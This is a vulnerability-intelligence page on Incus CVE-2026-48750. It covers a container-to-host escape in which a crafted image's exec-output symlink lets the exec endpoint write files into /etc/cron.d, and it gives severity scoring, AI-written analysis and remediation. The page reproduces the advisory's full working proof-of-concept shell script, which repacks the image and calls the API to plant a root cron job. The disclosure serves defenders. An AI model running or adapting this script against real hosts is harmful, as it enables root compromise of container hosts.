Incus CVE-2026-48750
CRITICALSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Authenticated API user (PR:L) reliably writes attacker-controlled files to the host, escaping the instance (S:C) to gain root code execution with full C/I/A impact.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The record-output parameter of the /instances/$name/exec endpoint stores the output of the command in the exec-output directory of the instance. If exec-output is a symlink, file named exec_UUID.stdout and exec_UUID.stderr can be written to an arbitrary location where the .stdout file will contain arbitrary content. This behavior can be abused for arbitrary command execution.
Details
When an image is unpacked, top-level symlinks are extracted as is; allowing for exec-output to be placed on disk. In instance_exec.go, os.Mkdir continues of exec-output exists and os.OpenFile follows the exec-output symlink.
PoC
Below, we place the exec_UUID.stdout file in /etc/cron.d on the host for arbitrary command execution.
#!/bin/sh
# usage: $0 existing-imagefp
set -eu
basefp="${1}"
die() {
printf '%s' "${@}" >&2
exit 1
}
command -v curl >/dev/null 2>&1 || die 'error: curl not found\n'
command -v python3 >/dev/null 2>&1 || die 'error: python3 not found\n'
tmpdir=$(mktemp -d)
cleanup() {
rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP
# insert exec-output symlink
incus image export "${basefp}" "${tmpdir}/img"
mkdir "${tmpdir}/repack"
cd "${tmpdir}/repack"
xz -cd "${tmpdir}/img" | tar -f- -vx
rm -rf exec-output
ln -s /etc/cron.d exec-output
tar -f- -c * | gzip -c9 >"${tmpdir}/img"
cd - >/dev/null
incus image import "${tmpdir}"/img* --alias afw-exec-output
# Launch container, exec with record-output via REST API
incus launch afw-exec-output afw-exec-output
incus wait afw-exec-output ip
OP=$(curl -s --unix-socket /var/lib/incus/unix.socket \
-X POST -H 'Content-Type: application/json' \
-d '{"command":["/bin/sh","-c","echo * * * * * root id'"'>'"'/afw-exec-output"],"record-output":true}' \
"lxd/1.0/instances/afw-exec-output/exec" | python3 -c "import sys,json;print(json.load(sys.stdin)['operation'])")
curl -s --unix-socket /var/lib/incus/unix.socket "$OP/wait?timeout=30" >/dev/null
#find /etc/cron.d/exec_* -exec cat {} \;Impact
Constrained file creation in an arbitrary directory on the host via via an unsanitized symlink; possibly leading to command execution.
AnalysisAI
Host-side arbitrary file write in Incus (the LXD-fork container and VM manager) before 7.2.0 lets an attacker who can supply a crafted image and call the instance exec endpoint write attacker-controlled content to any path on the host, leading to root-level command execution. A top-level exec-output symlink packed into an image survives image unpacking, and when record-output:true is passed to /instances/$name/exec the daemon follows that symlink to write exec_UUID.stdout/.stderr outside the instance - for example into /etc/cron.d. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires (1) authenticated access to the Incus API sufficient to import an image and create/launch an instance, and (2) the ability to call the `/instances/$name/exec` endpoint with the `record-output` parameter set to true. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The published CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, base 9.9) reflects genuine severity: the scope change plus high impact captures the container-to-host root escape. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A lower-privileged but authorized Incus user crafts an image containing a top-level `exec-output` symlink pointing to a sensitive host directory such as `/etc/cron.d`, imports it, and launches a container from it. They then call `/instances/$name/exec` with `record-output:true` running a command whose stdout is a valid cron line; the daemon follows the symlink and writes `exec_UUID.stdout` into `/etc/cron.d`, and cron later executes the attacker's command as root on the host. … |
| Remediation | Upgrade to Incus 7.2.0 or later, which contains the fix (Vendor-released patch: 7.2.0); rebuild or repackage any distribution packages that bundle the incusd daemon from github.com/lxc/incus/v7. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all Incus installations prior to version 7.2.0 and restrict access to the exec endpoint via firewall rules. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-73 – External Control of File Name or Path
View allSame technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-73hr-m85f-64v9